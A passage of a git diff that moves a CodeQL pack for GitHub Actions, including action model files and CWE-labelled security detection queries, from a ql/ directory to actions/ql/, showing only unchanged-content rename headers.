rename from ql/lib/ext/manual/olafurpg_setup-scala.model.yml
rename to actions/ql/lib/ext/manual/olafurpg_setup-scala.model.yml
diff --git a/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml b/actions/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/paambaati_codeclimate-action.model.yml
rename to actions/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml
diff --git a/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml b/actions/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml
rename to actions/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml
diff --git a/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml b/actions/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml
similarity index 100%
rename from ql/lib/ext/manual/peter-evans_create-pull-request.model.yml
rename to actions/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml
diff --git a/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml b/actions/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml
rename to actions/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml
diff --git a/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml b/actions/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml
similarity index 100%
rename from ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml
rename to actions/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml
diff --git a/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml b/actions/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml
rename to actions/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml
diff --git a/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml b/actions/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml
similarity index 100%
rename from ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml
rename to actions/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml
diff --git a/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml b/actions/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/preactjs_compressed-size-action.model.yml
rename to actions/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml
diff --git a/ql/lib/ext/manual/py-actions_flake8.model.yml b/actions/ql/lib/ext/manual/py-actions_flake8.model.yml
similarity index 100%
rename from ql/lib/ext/manual/py-actions_flake8.model.yml
rename to actions/ql/lib/ext/manual/py-actions_flake8.model.yml
diff --git a/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml b/actions/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml
similarity index 100%
rename from ql/lib/ext/manual/py-actions_py-dependency-install.model.yml
rename to actions/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml
diff --git a/ql/lib/ext/manual/pyo3_maturin-action.model.yml b/actions/ql/lib/ext/manual/pyo3_maturin-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/pyo3_maturin-action.model.yml
rename to actions/ql/lib/ext/manual/pyo3_maturin-action.model.yml
diff --git a/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml b/actions/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml
similarity index 100%
rename from ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml
rename to actions/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml
diff --git a/ql/lib/ext/manual/read-file-actions.model.yml b/actions/ql/lib/ext/manual/read-file-actions.model.yml
similarity index 100%
rename from ql/lib/ext/manual/read-file-actions.model.yml
rename to actions/ql/lib/ext/manual/read-file-actions.model.yml
diff --git a/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml b/actions/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml
similarity index 100%
rename from ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml
rename to actions/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml
diff --git a/ql/lib/ext/manual/reggionick_s3-deploy.model.yml b/actions/ql/lib/ext/manual/reggionick_s3-deploy.model.yml
similarity index 100%
rename from ql/lib/ext/manual/reggionick_s3-deploy.model.yml
rename to actions/ql/lib/ext/manual/reggionick_s3-deploy.model.yml
diff --git a/ql/lib/ext/manual/release-kit_regex.model.yml b/actions/ql/lib/ext/manual/release-kit_regex.model.yml
similarity index 100%
rename from ql/lib/ext/manual/release-kit_regex.model.yml
rename to actions/ql/lib/ext/manual/release-kit_regex.model.yml
diff --git a/ql/lib/ext/manual/renovatebot_github-action.model.yml b/actions/ql/lib/ext/manual/renovatebot_github-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/renovatebot_github-action.model.yml
rename to actions/ql/lib/ext/manual/renovatebot_github-action.model.yml
diff --git a/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml b/actions/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/rishabh510_path-lister-action.model.yml
rename to actions/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml
diff --git a/ql/lib/ext/manual/roots_issue-closer-action.model.yml b/actions/ql/lib/ext/manual/roots_issue-closer-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/roots_issue-closer-action.model.yml
rename to actions/ql/lib/ext/manual/roots_issue-closer-action.model.yml
diff --git a/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml b/actions/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml
similarity index 100%
rename from ql/lib/ext/manual/ros-tooling_setup-ros.model.yml
rename to actions/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml
diff --git a/ql/lib/ext/manual/ruby_setup-ruby.model.yml b/actions/ql/lib/ext/manual/ruby_setup-ruby.model.yml
similarity index 100%
rename from ql/lib/ext/manual/ruby_setup-ruby.model.yml
rename to actions/ql/lib/ext/manual/ruby_setup-ruby.model.yml
diff --git a/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml b/actions/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml
similarity index 100%
rename from ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml
rename to actions/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml
diff --git a/ql/lib/ext/manual/sergeysova_jq-action.model.yml b/actions/ql/lib/ext/manual/sergeysova_jq-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/sergeysova_jq-action.model.yml
rename to actions/ql/lib/ext/manual/sergeysova_jq-action.model.yml
diff --git a/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml b/actions/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml
rename to actions/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml
diff --git a/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml b/actions/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml
similarity index 100%
rename from ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml
rename to actions/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml
diff --git a/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml b/actions/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml
similarity index 100%
rename from ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml
rename to actions/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml
diff --git a/ql/lib/ext/manual/snow-actions_eclint.model.yml b/actions/ql/lib/ext/manual/snow-actions_eclint.model.yml
similarity index 100%
rename from ql/lib/ext/manual/snow-actions_eclint.model.yml
rename to actions/ql/lib/ext/manual/snow-actions_eclint.model.yml
diff --git a/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml b/actions/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml
rename to actions/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml
diff --git a/ql/lib/ext/manual/step-security_harden-runner.model.yml b/actions/ql/lib/ext/manual/step-security_harden-runner.model.yml
similarity index 100%
rename from ql/lib/ext/manual/step-security_harden-runner.model.yml
rename to actions/ql/lib/ext/manual/step-security_harden-runner.model.yml
diff --git a/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml b/actions/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml
similarity index 100%
rename from ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml
rename to actions/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml
diff --git a/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml b/actions/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml
similarity index 100%
rename from ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml
rename to actions/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml
diff --git a/ql/lib/ext/manual/tibdex_backport.model.yml b/actions/ql/lib/ext/manual/tibdex_backport.model.yml
similarity index 100%
rename from ql/lib/ext/manual/tibdex_backport.model.yml
rename to actions/ql/lib/ext/manual/tibdex_backport.model.yml
diff --git a/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml b/actions/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml
similarity index 100%
rename from ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml
rename to actions/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml
diff --git a/ql/lib/ext/manual/timheuer_base64-to-file.model.yml b/actions/ql/lib/ext/manual/timheuer_base64-to-file.model.yml
similarity index 100%
rename from ql/lib/ext/manual/timheuer_base64-to-file.model.yml
rename to actions/ql/lib/ext/manual/timheuer_base64-to-file.model.yml
diff --git a/ql/lib/ext/manual/tj-actions_branch-names.model.yml b/actions/ql/lib/ext/manual/tj-actions_branch-names.model.yml
similarity index 100%
rename from ql/lib/ext/manual/tj-actions_branch-names.model.yml
rename to actions/ql/lib/ext/manual/tj-actions_branch-names.model.yml
diff --git a/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml b/actions/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml
rename to actions/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml
diff --git a/ql/lib/ext/manual/trilom_file-changes-action.model.yml b/actions/ql/lib/ext/manual/trilom_file-changes-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/trilom_file-changes-action.model.yml
rename to actions/ql/lib/ext/manual/trilom_file-changes-action.model.yml
diff --git a/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml b/actions/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml
rename to actions/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml
diff --git a/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml b/actions/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml
similarity index 100%
rename from ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml
rename to actions/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml
diff --git a/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml b/actions/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/tzkhan_pr-update-action.model.yml
rename to actions/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml
diff --git a/ql/lib/ext/manual/veracode_veracode-sca.model.yml b/actions/ql/lib/ext/manual/veracode_veracode-sca.model.yml
similarity index 100%
rename from ql/lib/ext/manual/veracode_veracode-sca.model.yml
rename to actions/ql/lib/ext/manual/veracode_veracode-sca.model.yml
diff --git a/ql/lib/ext/manual/w3f_action-find-old-files.model.yml b/actions/ql/lib/ext/manual/w3f_action-find-old-files.model.yml
similarity index 100%
rename from ql/lib/ext/manual/w3f_action-find-old-files.model.yml
rename to actions/ql/lib/ext/manual/w3f_action-find-old-files.model.yml
diff --git a/ql/lib/ext/manual/wearerequired_lint-action.model.yml b/actions/ql/lib/ext/manual/wearerequired_lint-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/wearerequired_lint-action.model.yml
rename to actions/ql/lib/ext/manual/wearerequired_lint-action.model.yml
diff --git a/ql/lib/ext/manual/webfactory_ssh-agent.model.yml b/actions/ql/lib/ext/manual/webfactory_ssh-agent.model.yml
similarity index 100%
rename from ql/lib/ext/manual/webfactory_ssh-agent.model.yml
rename to actions/ql/lib/ext/manual/webfactory_ssh-agent.model.yml
diff --git a/ql/lib/ext/manual/xom9ikk_dotenv.model.yml b/actions/ql/lib/ext/manual/xom9ikk_dotenv.model.yml
similarity index 100%
rename from ql/lib/ext/manual/xom9ikk_dotenv.model.yml
rename to actions/ql/lib/ext/manual/xom9ikk_dotenv.model.yml
diff --git a/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml b/actions/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml
similarity index 100%
rename from ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml
rename to actions/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml
diff --git a/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml b/actions/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml
similarity index 100%
rename from ql/lib/ext/manual/yumemi-inc_changed-files.model.yml
rename to actions/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml
diff --git a/ql/lib/ext/manual/zaproxy_action-baseline.model.yml b/actions/ql/lib/ext/manual/zaproxy_action-baseline.model.yml
similarity index 100%
rename from ql/lib/ext/manual/zaproxy_action-baseline.model.yml
rename to actions/ql/lib/ext/manual/zaproxy_action-baseline.model.yml
diff --git a/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml b/actions/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml
similarity index 100%
rename from ql/lib/ext/manual/zaproxy_action-full-scan.model.yml
rename to actions/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml
diff --git a/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml b/actions/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml
similarity index 100%
rename from ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml
rename to actions/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml
diff --git a/ql/lib/ide-contextual-queries/printAst.ql b/actions/ql/lib/ide-contextual-queries/printAst.ql
similarity index 100%
rename from ql/lib/ide-contextual-queries/printAst.ql
rename to actions/ql/lib/ide-contextual-queries/printAst.ql
diff --git a/ql/lib/ide-contextual-queries/printCfg.ql b/actions/ql/lib/ide-contextual-queries/printCfg.ql
similarity index 100%
rename from ql/lib/ide-contextual-queries/printCfg.ql
rename to actions/ql/lib/ide-contextual-queries/printCfg.ql
diff --git a/ql/lib/qlpack.yml b/actions/ql/lib/qlpack.yml
similarity index 100%
rename from ql/lib/qlpack.yml
rename to actions/ql/lib/qlpack.yml
diff --git a/ql/src/Debug/SyntaxError.ql b/actions/ql/src/Debug/SyntaxError.ql
similarity index 100%
rename from ql/src/Debug/SyntaxError.ql
rename to actions/ql/src/Debug/SyntaxError.ql
diff --git a/ql/src/Debug/partial.ql b/actions/ql/src/Debug/partial.ql
similarity index 100%
rename from ql/src/Debug/partial.ql
rename to actions/ql/src/Debug/partial.ql
diff --git a/ql/src/Models/CompositeActionsSinks.ql b/actions/ql/src/Models/CompositeActionsSinks.ql
similarity index 100%
rename from ql/src/Models/CompositeActionsSinks.ql
rename to actions/ql/src/Models/CompositeActionsSinks.ql
diff --git a/ql/src/Models/CompositeActionsSources.ql b/actions/ql/src/Models/CompositeActionsSources.ql
similarity index 100%
rename from ql/src/Models/CompositeActionsSources.ql
rename to actions/ql/src/Models/CompositeActionsSources.ql
diff --git a/ql/src/Models/CompositeActionsSummaries.ql b/actions/ql/src/Models/CompositeActionsSummaries.ql
similarity index 100%
rename from ql/src/Models/CompositeActionsSummaries.ql
rename to actions/ql/src/Models/CompositeActionsSummaries.ql
diff --git a/ql/src/Models/ReusableWorkflowsSinks.ql b/actions/ql/src/Models/ReusableWorkflowsSinks.ql
similarity index 100%
rename from ql/src/Models/ReusableWorkflowsSinks.ql
rename to actions/ql/src/Models/ReusableWorkflowsSinks.ql
diff --git a/ql/src/Models/ReusableWorkflowsSources.ql b/actions/ql/src/Models/ReusableWorkflowsSources.ql
similarity index 100%
rename from ql/src/Models/ReusableWorkflowsSources.ql
rename to actions/ql/src/Models/ReusableWorkflowsSources.ql
diff --git a/ql/src/Models/ReusableWorkflowsSummaries.ql b/actions/ql/src/Models/ReusableWorkflowsSummaries.ql
similarity index 100%
rename from ql/src/Models/ReusableWorkflowsSummaries.ql
rename to actions/ql/src/Models/ReusableWorkflowsSummaries.ql
diff --git a/ql/src/Security/CWE-074/OutputClobberingHigh.ql b/actions/ql/src/Security/CWE-074/OutputClobberingHigh.ql
similarity index 100%
rename from ql/src/Security/CWE-074/OutputClobberingHigh.ql
rename to actions/ql/src/Security/CWE-074/OutputClobberingHigh.ql
diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md b/actions/ql/src/Security/CWE-077/EnvPathInjectionCritical.md
similarity index 100%
rename from ql/src/Security/CWE-077/EnvPathInjectionCritical.md
rename to actions/ql/src/Security/CWE-077/EnvPathInjectionCritical.md
diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql b/actions/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql
similarity index 100%
rename from ql/src/Security/CWE-077/EnvPathInjectionCritical.ql
rename to actions/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql
diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md b/actions/ql/src/Security/CWE-077/EnvPathInjectionMedium.md
similarity index 100%
rename from ql/src/Security/CWE-077/EnvPathInjectionMedium.md
rename to actions/ql/src/Security/CWE-077/EnvPathInjectionMedium.md
diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql b/actions/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql
similarity index 100%
rename from ql/src/Security/CWE-077/EnvPathInjectionMedium.ql
rename to actions/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql
diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.md b/actions/ql/src/Security/CWE-077/EnvVarInjectionCritical.md
similarity index 100%
rename from ql/src/Security/CWE-077/EnvVarInjectionCritical.md
rename to actions/ql/src/Security/CWE-077/EnvVarInjectionCritical.md
diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/actions/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql
similarity index 100%
rename from ql/src/Security/CWE-077/EnvVarInjectionCritical.ql
rename to actions/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql
diff --git a/ql/src/Security/CWE-077/EnvVarInjectionMedium.md b/actions/ql/src/Security/CWE-077/EnvVarInjectionMedium.md
similarity index 100%
rename from ql/src/Security/CWE-077/EnvVarInjectionMedium.md
rename to actions/ql/src/Security/CWE-077/EnvVarInjectionMedium.md
diff --git a/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql b/actions/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql
similarity index 100%
rename from ql/src/Security/CWE-077/EnvVarInjectionMedium.ql
rename to actions/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql
diff --git a/ql/src/Security/CWE-078/CommandInjectionCritical.ql b/actions/ql/src/Security/CWE-078/CommandInjectionCritical.ql
similarity index 100%
rename from ql/src/Security/CWE-078/CommandInjectionCritical.ql
rename to actions/ql/src/Security/CWE-078/CommandInjectionCritical.ql
diff --git a/ql/src/Security/CWE-078/CommandInjectionMedium.ql b/actions/ql/src/Security/CWE-078/CommandInjectionMedium.ql
similarity index 100%
rename from ql/src/Security/CWE-078/CommandInjectionMedium.ql
rename to actions/ql/src/Security/CWE-078/CommandInjectionMedium.ql
diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.md b/actions/ql/src/Security/CWE-088/ArgumentInjectionCritical.md
similarity index 100%
rename from ql/src/Security/CWE-088/ArgumentInjectionCritical.md
rename to actions/ql/src/Security/CWE-088/ArgumentInjectionCritical.md
diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql b/actions/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql
similarity index 100%
rename from ql/src/Security/CWE-088/ArgumentInjectionCritical.ql
rename to actions/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql
diff --git a/ql/src/Security/CWE-088/ArgumentInjectionMedium.md b/actions/ql/src/Security/CWE-088/ArgumentInjectionMedium.md
similarity index 100%
rename from ql/src/Security/CWE-088/ArgumentInjectionMedium.md
rename to actions/ql/src/Security/CWE-088/ArgumentInjectionMedium.md
diff --git a/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql b/actions/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql
similarity index 100%
rename from ql/src/Security/CWE-088/ArgumentInjectionMedium.ql
rename to actions/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql
diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.md b/actions/ql/src/Security/CWE-094/CodeInjectionCritical.md
similarity index 100%
rename from ql/src/Security/CWE-094/CodeInjectionCritical.md
rename to actions/ql/src/Security/CWE-094/CodeInjectionCritical.md
diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/actions/ql/src/Security/CWE-094/CodeInjectionCritical.ql
similarity index 100%
rename from ql/src/Security/CWE-094/CodeInjectionCritical.ql
rename to actions/ql/src/Security/CWE-094/CodeInjectionCritical.ql
diff --git a/ql/src/Security/CWE-094/CodeInjectionMedium.md b/actions/ql/src/Security/CWE-094/CodeInjectionMedium.md
similarity index 100%
rename from ql/src/Security/CWE-094/CodeInjectionMedium.md
rename to actions/ql/src/Security/CWE-094/CodeInjectionMedium.md
diff --git a/ql/src/Security/CWE-094/CodeInjectionMedium.ql b/actions/ql/src/Security/CWE-094/CodeInjectionMedium.ql
similarity index 100%
rename from ql/src/Security/CWE-094/CodeInjectionMedium.ql
rename to actions/ql/src/Security/CWE-094/CodeInjectionMedium.ql
diff --git a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md b/actions/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md
similarity index 100%
rename from ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md
rename to actions/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md
diff --git a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql b/actions/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql
similarity index 100%
rename from ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql
rename to actions/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql
diff --git a/ql/src/Security/CWE-200/SecretExfiltration.ql b/actions/ql/src/Security/CWE-200/SecretExfiltration.ql
similarity index 100%
rename from ql/src/Security/CWE-200/SecretExfiltration.ql
rename to actions/ql/src/Security/CWE-200/SecretExfiltration.ql
diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.md b/actions/ql/src/Security/CWE-275/MissingActionsPermissions.md
similarity index 100%
rename from ql/src/Security/CWE-275/MissingActionsPermissions.md
rename to actions/ql/src/Security/CWE-275/MissingActionsPermissions.md
diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.ql b/actions/ql/src/Security/CWE-275/MissingActionsPermissions.ql
similarity index 100%
rename from ql/src/Security/CWE-275/MissingActionsPermissions.ql
rename to actions/ql/src/Security/CWE-275/MissingActionsPermissions.ql
diff --git a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql b/actions/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql
similarity index 100%
rename from ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql
rename to actions/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql
diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.md b/actions/ql/src/Security/CWE-285/ImproperAccessControl.md
similarity index 100%
rename from ql/src/Security/CWE-285/ImproperAccessControl.md
rename to actions/ql/src/Security/CWE-285/ImproperAccessControl.md
diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.ql b/actions/ql/src/Security/CWE-285/ImproperAccessControl.ql
similarity index 100%
rename from ql/src/Security/CWE-285/ImproperAccessControl.ql
rename to actions/ql/src/Security/CWE-285/ImproperAccessControl.ql
diff --git a/ql/src/Security/CWE-312/ExcessiveSecretsExposure.md b/actions/ql/src/Security/CWE-312/ExcessiveSecretsExposure.md
similarity index 100%
rename from ql/src/Security/CWE-312/ExcessiveSecretsExposure.md
rename to actions/ql/src/Security/CWE-312/ExcessiveSecretsExposure.md
diff --git a/ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql b/actions/ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql
similarity index 100%
rename from ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql
rename to actions/ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql
diff --git a/ql/src/Security/CWE-312/SecretsInArtifacts.md b/actions/ql/src/Security/CWE-312/SecretsInArtifacts.md
similarity index 100%
rename from ql/src/Security/CWE-312/SecretsInArtifacts.md
rename to actions/ql/src/Security/CWE-312/SecretsInArtifacts.md
diff --git a/ql/src/Security/CWE-312/SecretsInArtifacts.ql b/actions/ql/src/Security/CWE-312/SecretsInArtifacts.ql
similarity index 100%
rename from ql/src/Security/CWE-312/SecretsInArtifacts.ql
rename to actions/ql/src/Security/CWE-312/SecretsInArtifacts.ql
diff --git a/ql/src/Security/CWE-312/UnmaskedSecretExposure.md b/actions/ql/src/Security/CWE-312/UnmaskedSecretExposure.md
similarity index 100%
rename from ql/src/Security/CWE-312/UnmaskedSecretExposure.md
rename to actions/ql/src/Security/CWE-312/UnmaskedSecretExposure.md
diff --git a/ql/src/Security/CWE-312/UnmaskedSecretExposure.ql b/actions/ql/src/Security/CWE-312/UnmaskedSecretExposure.ql
similarity index 100%
rename from ql/src/Security/CWE-312/UnmaskedSecretExposure.ql
rename to actions/ql/src/Security/CWE-312/UnmaskedSecretExposure.ql
diff --git a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md b/actions/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md
similarity index 100%
rename from ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md
rename to actions/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md
diff --git a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql b/actions/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql
similarity index 100%
rename from ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql
rename to actions/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql
diff --git a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md b/actions/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md
similarity index 100%
rename from ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md
rename to actions/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md
diff --git a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql b/actions/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql
similarity index 100%
rename from ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql
rename to actions/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql
diff --git a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md b/actions/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md
similarity index 100%
rename from ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md
rename to actions/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md
diff --git a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql b/actions/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql
similarity index 100%
rename from ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql
rename to actions/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql
diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md b/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md
similarity index 100%
rename from ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md
rename to actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md
diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql
similarity index 100%
rename from ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql
rename to actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql
diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.md b/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.md
similarity index 100%
rename from ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.md
rename to actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.md
diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql
similarity index 100%
rename from ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql
